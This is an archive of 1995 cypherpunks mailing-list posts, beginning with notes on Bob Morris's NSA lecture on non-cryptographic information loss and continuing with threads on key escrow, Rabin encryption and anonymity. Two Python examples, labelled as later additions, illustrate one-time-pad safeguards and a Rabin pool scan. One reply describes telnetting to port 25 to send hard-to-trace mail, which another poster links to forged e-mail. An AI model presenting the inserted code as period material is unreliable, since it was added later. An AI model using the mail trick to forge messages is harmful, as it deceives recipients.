Bob Morris (recently retired from NSA) gave a fascinating invited lecture
entitled "Non-cryptographic Ways of Losing Information".  I hope he writes
it up; until then, here are my notes from his presentation.

Two things he said which I found new and fascinating:

- During the early 1950's many major powers were discouraged by the
  tendency of then-modern crypto machines to fail in a way that would send
  plaintext instead of ciphertext, and they went to one time pads for most
  of their high-level enciphered traffic.  Because of key re-use, we were
  regularly and routinely reading pieces of that traffic -- not just
  VENONA, but many systems from various countries.  Sometimes the people
  who prepared OTP's would double their profit by selling them to more
  than one customer.

- By the middle to late 1960's cryptanalysis became less cost effective
  than obtaining the information by other means -- wiretaps and so on.

Morris emphasized and said we should write down these dicta:
-------------------------------------------------------------------------
Never underestimate the attention, risk, money and time that an opponent
will put into reading traffic.

Rule 1 of cryptanalysis: check for plaintext.
-------------------------------------------------------------------------

The real start of modern cryptology should be dated to the Enigma
machines, which typified the new character of the art.  Much has been made
of the errors of the German cipher clerks, but egregious as they were, the
errors made by the British cryptographers were vastly worse, and the
American blunders were worse yet.  German analysts regularly read and used
Atlantic convoy orders throughout the war -- they were transmitted in an
old code.

One must always assume that the enemy has a copy of the machine/algorithm.
A system that relies on keeping the algorithm secret is eventually doomed
to failure, because it will always be discovered by some means or other.

He sees microphones and antennas everywhere: the telephone line cord is
an antenna; if telephone linemen were working on a pole outside his house
he'd call the police and then find out what they were working on.  In an
unspecified country he called Lower Slobbovia (Al Capp, isn't it?) American
troops used encrypted radiophones; when they broke they were taken to local
repair shops to be fixed.  When they got home the US engineers were
interested to see the modifications that had been made.  He mentioned a
few similar instances, including the lovely carved wooden seal given to
the US Embassy in Moscow to decorate their anteroom. [It's now on view at
the National Cryptologic Museum with the transmitter cavity visible.]
Cordless phones have a range of 5 miles or so.  Use of cellular phones is
increasing dramatically, as well as fax and modems.

He discussed the Walker/Whitworth spying case, and said one of his design
criteria is to design systems with Walker in them: it's not good enough to
have a system where everyone must be trusted, but it must also be made
robust against insiders.  This may include going to non-paper systems, so
that there are no paper keys that the Walkers of the world can shop to the
other side.

Threats and risks include: overconfidence, carelessness, eavesdropping and
tapping, theft of floppies and other materials, purchase, theft of key
material, burglary and blackmail.  Much or most loss is due to insiders.

In the future there will be more radio used for ordinary communications.
Americans are unwilling to pay for secure telephones, but that's not the
case in Europe.

-------------------------------------------------------------------------
Reported by:

	Jim Gillogly
	12 Halimath S.R. 1995, 04:33
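
[Added example, not part of the notes above or of Morris's lecture: a
Python sketch of two defensive checks his points suggest, an output guard
that applies "check for plaintext" to your own link, and a pad book that
never issues the same key bytes twice.  All names and the sample messages
are constructed for illustration.]

```python
import os

# Constructed sample messages (not real traffic).
MSG_A = b"Weekly report: supply levels nominal, no changes to schedule."
MSG_B = b"Meeting moved to Thursday; bring the revised budget figures."

# Printable ASCII plus tab, LF, CR: 98 of 256 byte values (about 38%).
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def fresh_pad(n: int) -> bytes:
    """Return n bytes of key material from the OS random source."""
    return os.urandom(n)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


def looks_like_plaintext(frame: bytes, threshold: float = 0.85) -> bool:
    """True if the frame is mostly printable text.

    Properly enciphered bytes are close to uniform, so only about 38% of
    them are printable; natural-language text is near 100%.
    """
    if not frame:
        return False
    printable = sum(b in PRINTABLE for b in frame)
    return printable / len(frame) >= threshold


def safe_to_transmit(frame: bytes, min_len: int = 32) -> bool:
    """Output guard: release a frame only if it does not look like text.

    Frames shorter than min_len cannot be judged statistically, so the
    guard fails closed and holds them.
    """
    if len(frame) < min_len:
        return False
    return not looks_like_plaintext(frame)


class PadExhausted(Exception):
    """Raised instead of wrapping around and re-using key bytes."""


class PadBook:
    """Hands out each byte of a one-time pad exactly once."""

    def __init__(self, pad: bytes):
        self._pad = pad
        self._next = 0

    @property
    def remaining(self) -> int:
        return len(self._pad) - self._next

    def take(self, n: int) -> bytes:
        if n > self.remaining:
            raise PadExhausted(f"need {n} bytes, {self.remaining} left")
        chunk = self._pad[self._next:self._next + n]
        self._next += n
        return chunk


def encipher(book: PadBook, plaintext: bytes, device_fault: bool = False) -> bytes:
    """One-time-pad encryption; device_fault simulates the failure mode in
    which the machine consumes key but passes the plaintext through."""
    key = book.take(len(plaintext))
    if device_fault:
        return plaintext
    return xor(plaintext, key)


def reuse_residue(p1: bytes, p2: bytes, pad: bytes) -> bytes:
    """What is on the wire when one pad covers two messages: XORing the
    two ciphertexts cancels the pad and leaves p1 XOR p2."""
    c1 = xor(p1, pad[:len(p1)])
    c2 = xor(p2, pad[:len(p2)])
    n = min(len(c1), len(c2))
    return xor(c1[:n], c2[:n])


if __name__ == "__main__":
    book = PadBook(fresh_pad(256))
    good = encipher(book, MSG_A)
    bad = encipher(book, MSG_B, device_fault=True)
    print("healthy frame released:", safe_to_transmit(good))
    print("faulty frame released: ", safe_to_transmit(bad))
    n = min(len(MSG_A), len(MSG_B))
    residue = reuse_residue(MSG_A, MSG_B, fresh_pad(128))
    print("pad cancels on re-use: ", residue == xor(MSG_A[:n], MSG_B[:n]))
```
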





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 2 Sep 95 20:43:40 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B05513.00030003DB.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


BS> For the problem that started this discussion, though, there's no good solution.
BS> Since the Bad Guys _can_ encrypt a message to you with your signature key,
BS> and send it to you by anonymous remailer, they can plant a reason to suspect
BS> that you may have evidence encrypted with that key.

  You've got it backwards. The problem that I originally posited was a
corrupt key escrow agent using my signature key to forge a document. The
fact that my signature pubkey could be used to encrypt messages to me is
not particularly relevant. My employer could set up filters to keep me
from receiving email on company time that is not encrypted to a key that
the corporate escrow authority has in its possession.  NBD.

  My concern here is with the NGACK situation. Companies have valid
reasons to want escrow for their own purposes. I'm just warning people
not to accept a signature key being escrowed by =anyone=. When you
create a key to be escrowed, make sure the userid includes something
like [Not Valid For Signatures].


 * Pro Choice on Abortion.
 * No choice on Education.
 * Huh?
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 2 Sep 95 20:43:42 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <8B05513.00030003DC.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> Oh, I agree, of course. Except that the escrow agent need not be a
TC> "nonymous" agent, to use Monty's terminology here.

  Sorry, my Greek is rusty.  Shoulda been "onymous", I suppose.

  But if the escrow agent is anonymous, we simply recurse, moving now to
the question of whether anyone can trust the Anonymous Escrow Agency not
to take the money and run.

TC> (I mention banks because, when you look at it closely, today's banks can
TC> quite easily claim that a customer made a withdrawal when he didn't. That
TC> they don't says more about the nature of persistent businesses than about
TC> any government oversight or security features. This is a side point, but it
TC> bears keeping in mind that the real world of banks and businesses, etc., is
TC> not fully secure, either. And yet it mostly works pretty well. The reasons
TC> for this are interesting to consider.)

  A bank has $$ invested in impressive-looking buildings, (so that
vanishing into the ether and setting up shop elsewhere is rather
difficult) and several officers whose TrueNames are registered with the
appropriate agencies, so that they may be sued if they pull this
crap.

  While individual stockholders might appreciate the anonymity (and
protection from legal action) of owning stock in a bank or escrow agency
(might just combine the functions, while we're at it), they demand
onymity of the officers with whom they entrust the keys to the
corporation.




 *    
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sat, 2 Sep 95 18:58:20 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: Basic Public key algorithms.
In-Reply-To: <199509030031.UAA29612@frankenstein.piermont.com>
Message-ID: <Pine.A32.3.91.950902215716.16072A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Sep 1995, Perry E. Metzger wrote:

> > > No, because one patent covers public key cryptography itself, and not
> > > a particular method.
> > 
> > Point of information--I'm not flaming you Perry, but Public Key Partners 
> > claims that their patent covers all forms of Public Key Crypto.
> 
> How is this at all different from what I just said?

It isn't.  I just misread what you wrote.

Mea culpa.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  
PGP encrypted mail welcomed--finger samman@cs.yale.edu for public key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMEkLmL5ALmeTVXAJAQHotAL/bW9tN3Lf+9ATx8ks0s8kz8O3zTikverx
y9bJfsQRaoDtJkNmeiFPBSCIl9q27OIdpN4tyExmFztJVgEdxRYcqZ19ZcXVDRpI
B//GwQQ45JXl1ZKurT0cr2poIecCAFuE
=/0J/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 22:00:36 PDT
To: cypherpunks@toad.com
Subject: Cyphernomicon
Message-ID: <v01510103ac6ed8b35fa2@[198.59.115.136]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to all who helped me get my hands on Cyphernomicon.

I now can breeze through the html site at www.oberlin.edu.  I guess at 2am
it didn't work because either I or oberlin were too sleepy.  I still cannot
open an FTP port at netcom.

I got a copy on my Mac by giving a lot of memory to Netscape and getting it
from www.swiss.ai.mit.edu.  I also got a copy from Jeff's zipped copy at
ftp.goblin.punk.net, but my unzipping utility hacked out a few lines.

Here is a summary of what I learned:

  Cyphernomicon
  File Size:  1,287,731 (single character newlines)

  FTP sites:

     ftp.netcom.com/pub/tc/tcmay/CP-FAQ
     The original.  "crowded"  (I couldn't open an FTP port.)

     ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz
     ftp.goblin.punk.net/pub/docs/cypherfq.zip
     28.8 bps modem, newline=CR, but .zip will change to newline=CRLF
     About 432Kbytes.
     (On PPP@14.4 it took me 6+ minutes to get it.)
     "until someone posts it on a site with higher bandwidth"

     [the upcoming new/changed/mirrored Cypherpunk site]

  HTML site:

     http://www.oberlin.edu/~brchkind/cyphernomicon/
     nice.

  Other http: sites:

     http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ
     text.  very responsive and fast (6 minutes for my 14.4 connection).

     http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
     text

     http://www.msen.com/~lwp/Cyphernomicon.gz
     About 432Kbytes.  Need g[un]zip utility.

Clearly missing are credits and contact info.

I probably won't get to the FAQ much this weekend (wife & kids expect me to
do my share and bring home the bacon), but maybe in a week or two.  Do I
have to read the sci.crypt FAQ, too, to earn my FAQ badge?

Dar
(list newbie)



===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 3 Sep 95 01:45:44 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B0556B.00030003E0.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


RA> separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut
RA> for the two processes done in sequence using the same key for both

  The only way that -es uses the same key for both the encryption and
signature is if I have EncryptToSelf turned on, or I explicitly specify
my signature key as one of the recipients. My privkey is used for the
signature, but =your= pubkey is used for the encryption.



 * A dork with a modem can become a dork with a modem and an Internet address.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 2 Sep 95 14:45:23 PDT
To: cypherpunks@toad.com
Subject: Re: anyone know what this "top secret" code does?
In-Reply-To: <40odtn$1md@teal.csn.net>
Message-ID: <199509022145.XAA02299@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


hallam@zorch.w3.org (Phillip M. Hallam-Baker) wrote:

> The code looks more than a casual hoax.  It's not Skipjack, but that
> does not mean it's not NSA originated.  It's probable that many of the
> people who designed skipjack don't know it's skipjack.  If you read
> the code carefully it is obvious why it's not skipjack, an S2
> algorithm is referenced explicitly.

[...]

> Regardless about whether or not it is skipjack it challenges one of
> the basic assumptions of many cipher designers, namely that the
> amount of diffusion should be maximized at each round.  I am now
> very much less than convinced that this is in fact an issue.  The S1
> design with its narrow diffusion provides very strong guarantees
> that one round cannot undo the work of the previous one.

> S1 must therefore be considered to be a significant contribution to
> the cryptographic community. It has challenged a fundamental tenet of
> faith which has so far been accepted without argument. It is thus
> paradigmatic in that it may lead to a new method of cipher design.

Does anyone remember the scenario someone suggested awhile back that
hypothesized a scheme by the NSA or other TLAs to encourage the use
of WEAK crypto?  It involved spreading a lot of F.U.D. about PGP and
other strong crypto methods, followed by the discovery/leak of a
supposedly "strong" crypto algorithm to replace it.

This may not be it.  It may just be a trial balloon to gauge the
reaction of the crypto community to an anonymous, "gift from heaven"
crypto algorithm.  But at least be aware of what COULD happen.

One tactic that might be tried is an intentional "leak", followed by
a flurry of legal actions designed to make it look like the "leak"
was going to cause some real damage to their cryptanalysis efforts,
due to it being "unbreakable", or whatever.  Of course, anything
"leaked" would be crippled in some undetectable manner so as to
provide a back door...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 22:49:23 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <v01510104ac6eec5efe93@[198.59.115.136]>
MIME-Version: 1.0
Content-Type: text/plain


Having not read the FAQ, I foolishly jump in...

Timothy May wrote,
>At 2:38 AM 9/3/95, MONTY HARDER wrote:
>
>>  But if the escrow agent is anonymous, we simply recurse, moving now to
>>the question of whether anyone can trust the Anonymous Escrow Agency not
>>to take the money and run.
>
>Well, at one level, everything is always recursive.
[snip]
>And, of course, it is possible to structure things so that the escrow agent
>cannot "take the money and run," because the money is not accessible to
>them.
>
>This is analogous to an escrow agent in the real world holding a check from
>Alice to Bob until Bob completes some set of conditions. The escrow
>agent--call her Essie--cannot cash the check herself. She can of course
>renege on the deal, even if Bob does his part of the bargain, but there is
>little incentive for her to do so.

For example, the money exchanger or bank can allow an exchange option that
packages up the new money for some AND/OR list of package openers, certify
what it is and then seal it up & send it to the escrow agent.  As mentioned
by Timothy and Monty this just pushes the question down to whether anyone
can trust the bank.  Timothy claims evidence that there will be entities
such as banks that do not scam customers.

I observe that from a few trusted entities a great amount of trust can be
created--bubbling up that same recursion.  In the above example, the trust
of the Anonymous Escrow Agency is increased by the mechanism that does not
allow the agency to get at the cash.  This uses the trust of the bank, but
does not decrease the trust of the bank.

Perhaps trust formal transfer mechanisms can evolve so that almost
everybody can become almost as trustworthy as the most trustworthy entity
in the commerce.

Dar
(who knows he should have checked the FAQ)


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790  <---
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files are in this order:
AOL, Mime, Binhex4, PGP, UUencode
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 3 Sep 95 00:06:05 PDT
To: cypherpunks@toad.com
Subject: Mailing List Archive
Message-ID: <Pine.SGI.3.91.950903000118.15454B-100000@Sequoia.picosof.com>
MIME-Version: 1.0
Content-Type: text/plain



For personal reasons (my dislike for big mailboxes) I've set up 
hypermail to archive the Cypherpunks list at:

http://got.net/CypherpunksArchive/

If someone else has done this, I'll stop fiddling with the configs and 
come use yours.

I just set it up, so it's rather empty today... If someone has a 
non-html archive of the messages, I'm up to tossing some perl around and 
converting it for the archive.

--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
                  "Shoot the Fruit Loop"               408.469.9400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 3 Sep 95 00:18:05 PDT
To: cypherpunks@toad.com
Subject: Re: Mailing List Archive
In-Reply-To: <Pine.SGI.3.91.950903000118.15454B-100000@Sequoia.picosof.com>
Message-ID: <Pine.SGI.3.91.950903001558.15750A-100000@Sequoia.picosof.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Jay Campbell wrote:

> For personal reasons (my dislike for big mailboxes) I've set up 
> hypermail to archive the Cypherpunks list at:
> 
> http://got.net/CypherpunksArchive/

Oops - the real (but temporary) URL is actually:

http://got.net:8080/CypherpunksArchive/

--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
                  "Shoot the Fruit Loop"               408.469.9400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 3 Sep 95 01:43:06 PDT
To: cypherpunks@toad.com
Subject: SSLRef (SSLtelnet)
Message-ID: <199509030845.CAA00124@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have been looking at a number of SSLTelnet/FTP programs (available from
utopia.hacktic.nl by the way) and they would seem to all require Netscape's
library. Anyone know about this?

I found the following link for SSLRef but I was just wondering if it
was the only way to implement SSL telnet&ftp. I would hate to see
people not be able to use them simply because there's no illegal copies
available. 

  URL: http://home.netscape.com/info/sslref.html

If anyone knows of any clones or foreign sources please speak up.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMElX4cLa+QKZS485AQERIQL/SBZAOAdAWSzfl/W9GNfDEU7e+3pBua5s
z84iGGuT5CfCGM4X5rYGKV4DuRVfFPyNQc++bn8SpPgyenbvBK+gc6400FHVskr3
Y4HAlBTqSSoyfOUHlhnEAs63nsjDGdFM
=ihYg
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

PS: my failure to lament violations of ITAR should not be confused with
actual involvement in criminal activity. Heh heh heh. Catchyalater




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cybie@cris.com
Date: Sun, 3 Sep 95 02:07:59 PDT
To: loki@obscura.com (Lance Cottrell)
Subject: Re: Direct Socket to Remailer?
In-Reply-To: <ac6da5d1010210040573@[137.110.24.250]>
Message-ID: <9509030907.AA04231@mariner.cris.com>
MIME-Version: 1.0
Content-Type: text


> 
> At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote:
> >I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
> >The procedure, quite frankly, sounds rather complicated.
> >
> 
> You should try the telnet port 25 trick. It is amazingly simple (but not
> secure). Just "telnet some.machine.com 25" and type help. It will guide you
> through it. It is quite informative.
> 
>         -Lance

Before you do it, make sure your ISP doesn't mind you telnetting to port 25.
VCU's computer dept. doesn't take too kindly to it.  They're worried about 
people sending forged e-mail.  (I was tempted to tell the guy when I got 
caught doing it that they should put a copy of PGP online for folks to use.
But I just wanted my account re-instated.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Sep 95 08:25:23 PDT
To: cypherpunks@toad.com
Subject: PEE_per
Message-ID: <199509031244.IAA20069@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-3-95. NYPaper:


   "500,000 Clients, No Branches. Phone Banking Is Catching
   On."

      Bankers from around the world are making the pilgrimage
      to Leeds in the north of England for a miracle cure at
      their stagnant industry's equivalent of a Lourdes. Here
      is First Direct, a bank with half a million customers
      and not a single branch. It is the world's leading
      telephone-only bank; it is the fastest-growing bank in
      Britain. On the walls are sports stadium scoreboards,
      constantly flashing the number of customers on hold and
      how long they have been waiting. While a banker serves
      a customer, his computer screen is displaying all sorts
      of personal information about her. "No Adverse Risk"
      flashes at the top, indicating that the bank would be
      glad to loan her money. Also displayed is the fact that
      she is a 30-year-old single renter with a job as a
      project manager, along with a list of all the bank's
      prior contacts with her.



   PEE_per











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hfinney@shell.portal.com
Date: Sun, 3 Sep 95 08:18:22 PDT
To: cypherpunks@toad.com
Subject: Slightly faster checking for encrypted messages to me
Message-ID: <199509031517.IAA26595@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One idea we have often discussed is to use a public message pool such
as a newsgroup or mailing list reflector as a means of receiving
messages anonymously.  Each message would be encrypted with my public
key (or that of my pseudonym), but with the identifying information
stripped.  Then I need to scan them all to see which ones are encrypted
to me.  Those are the ones which decrypt under the public key system to
a correctly padded session key.  Doing it this way eavesdroppers can't
even tell how much mail my nym is receiving.

The problem is that doing a PK decrypt is time consuming, and if we had
to do it to all the anonymous mail traffic in the world it could become
impractical.

I had hoped that Shamir's idea which I posted earlier would help with
this, but I can't see an application.  His idea helps to check for
specific signatures, which is a thing anyone can do, but he lets you do
it faster.  We need a faster way to do a check which only the holder of
the secret key can do.

I have thought of a small improvement based on Shamir's ideas, though.
Use Rabin encryption rather than RSA.  In this system the decryption
involves taking square roots.  This is done by taking the square root of
the ciphertext mod p and q (the two secret primes) and using the Chinese
Remainder Theorem to get the square root mod n.  (This is also done in
RSA with eth roots.)

If p and q are 3 mod 4, you can get the square root of x mod p as x^((p+1)/4)
mod p.  This is done for p and q and you then combine them.  So the
amount of work is pretty much the same as for RSA.

However a speedup is possible to do a quicker check for a validly formed
encrypted message.  The idea is that the encrypted message is of the form
M^2 mod n.  This means that it is a quadratic residue mod n, and also
therefore a q.r. mod p and q.  So the speedup is simply to check whether
it is a q.r. mod one of the primes and to reject it if not.  This takes
about half the amount of time to actually try the decryption.

All valid messages will pass the test, and half of the invalid messages
will be rejected.  So this is not very strong, but it is perhaps better
than nothing.  Maybe Shamir will come up with some idea for this
problem.

As I wrote before, testing for a q.r. is done by raising to the (p-1)/2
power mod p, and seeing if the answer is 1.  I think this can be done
in such a way that if it does come out to be 1 we can use our
intermediate results to calculate the (p+1)/4 needed for the square
root very quickly.

Also, BTW Rabin encryption is not specifically patented, only the
relatively-untested and almost-expired patent which covers all public
key systems (with the failed knapsack algorithm as its specific
embodiment) would supposedly prevent its use.  However even PKP is
apparently becoming more reluctant to throw its weight around on this
patent, while they are still quite possessive about RSA.  So perhaps a
migration to Rabin is in order.

Hal
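
Added example, not part of the message above and not code from its author: a Python sketch of the pool scan it describes, with the quadratic-residue pre-filter and the reuse of one exponentiation for both the (p-1)/2 test and the (p+1)/4 square root. The toy primes, the 32-bit tag standing in for "correct padding", and all function names are assumptions made for illustration.

```python
"""Rabin message-pool scan with a quadratic-residue pre-filter."""
import random
from collections import Counter

# Constructed toy key: two Mersenne primes, both congruent to 3 mod 4.
# A real key would use secret random primes of 512 bits or more.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q

# Assumption: a fixed 32-bit tag stands in for "correct padding", so the
# recipient can recognise the right one of the four square roots.
TAG = 0x52414249
TAG_BITS = 32


def encrypt(session_key, n=N):
    """Rabin encryption: square the padded session key mod n."""
    padded = (session_key << TAG_BITS) | TAG
    if not 0 < padded < n:
        raise ValueError("padded message must be smaller than n")
    return pow(padded, 2, n)


def qr_check(c, p):
    """Euler's criterion for c mod p, where p is a prime with p = 3 mod 4.

    A single exponentiation t = x^((p-3)/4) gives both quantities:
      x^((p+1)/4) = t*x    (the candidate square root)
      x^((p-1)/2) = t*t*x  (equals 1 exactly when x is a residue)
    Returns (is_residue, root).
    """
    x = c % p
    if x == 0:
        return True, 0
    t = pow(x, (p - 3) // 4, p)
    root = t * x % p
    euler = root * t % p
    return euler == 1, root


def try_decrypt(c, p=P, q=Q):
    """Return (session_key or None, stage at which the attempt ended)."""
    ok_p, root_p = qr_check(c, p)
    if not ok_p:
        return None, "not_qr_p"      # rejected early: no mod-q work, no CRT
    ok_q, root_q = qr_check(c, q)
    if not ok_q:
        return None, "not_qr_q"
    q_inv = pow(q, -1, p)            # modular inverse, Python 3.8+
    for sp in (root_p, p - root_p):
        for sq in (root_q, q - root_q):
            # Chinese Remainder Theorem: r = sp (mod p) and r = sq (mod q)
            r = sq + q * ((sp - sq) * q_inv % p)
            if r & ((1 << TAG_BITS) - 1) == TAG:
                return r >> TAG_BITS, "ok"
    return None, "bad_padding"


def build_pool(session_keys, noise_count, seed=1995):
    """Constructed pool: real ciphertexts mixed with random 'other traffic'."""
    rng = random.Random(seed)
    pool = [encrypt(k) for k in session_keys]
    pool += [rng.randrange(1, N) for _ in range(noise_count)]
    rng.shuffle(pool)
    return pool


def scan_pool(pool):
    """Scan every pool entry; return recovered keys and a per-stage tally."""
    found, tally = [], Counter()
    for c in pool:
        key, stage = try_decrypt(c)
        tally[stage] += 1
        if key is not None:
            found.append(key)
    return found, tally


if __name__ == "__main__":
    keys = [0x1111222233334444, 0xDEADBEEFCAFEF00D]
    found, tally = scan_pool(build_pool(keys, 2000))
    print([hex(k) for k in found], dict(tally))
```

About half of the random entries stop at the first stage, which matches the "half of the invalid messages will be rejected" estimate; the rest still cost a second exponentiation before padding rules them out.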




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:19:46 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <v02120d0fac6f841f967c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 9/3/95, Name Withheld by Request wrote:
>So Robert Morris worked for NSA.
>Does that mean that the infamous 1988 Internet Worm
>was part of a NSA-sponsored intelligence-gathering mission?

The worm was released by his son.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:19:49 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v02120d11ac6f852cd5d8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:53 9/3/95, David R. Conrad wrote:

>Obviously, but I think many people would resist it if they collect it just
>for the sake of collecting it.  But if they say they are collecting it to
>put on the license in order to verify licenses "in the field", then the
>collection will be a lot more palatable to a lot more people.
>
>Have people in CA complained much that they collect it when you get the
>license?

The masses never complain. Fingerprints on driver licenses, pictures on
credit cards, and the soon to be mandatory medical monitoring devices that
continually check your bloodstream for toxins are for _your_ protection.

People demand more, not less, supervision. The government will gladly oblige.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Sep 95 05:35:15 PDT
To: cypherpunks@toad.com
Subject: 260_xxx
Message-ID: <199509031235.IAA19851@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-3-95. NYPaper:


   "It's a Hacker Meeting, So Hide Your Phones."

      Razor and Curious George showed up. Angstrom and
      Tigerboy and Cameo came, Rebel and Master Chemist, and
      the revered Emmanuel Goldstein. And there were dozens
      more, the illicit apparatus for filching pay-phone calls
      secreted deep in the pockets of shredded jeans, the
      hand-held Newton minicomputers at the ready. It was a
      time for all prudent people to hide their cellular
      phones and guard their calling cards, and for those who
      despise Nynex, Bell Atlantic and AT&T to rejoice.
      Because the electronic virtuosos in the public lobby of
      the Citicorp building at 53d Street and Lexington Avenue
      were networking to share clever and highly illegal ways
      of fooling the phone system and the corporate computer
      guard dogs meant to keep them out.


   260_xxx












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Sep 95 05:38:29 PDT
To: cypherpunks@toad.com
Subject: ARS_tug
Message-ID: <199509031238.IAA19949@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-3-95. NYPaper:


   "Aircraft Carrier May Give Way To Missile Ship."

      The aircraft carrier may soon be shoved off center stage
      by a new "arsenal ship" that would be able to rain 500
      missiles within a matter of minutes on targets hundreds
      of miles away, without risking pilots' lives. A carrier
      costs $4.5 billion to build and $440 million a year to
      operate. The new ship, essentially a floating missile
      barge, might cost only $500 million and just tens of
      millions a year to run. The new ship would fire Tomahawk
      cruise missiles, long-range artillery shells or rocket
      barrages against ammunition dumps, command posts and
      artillery. It could prove particularly valuable in the
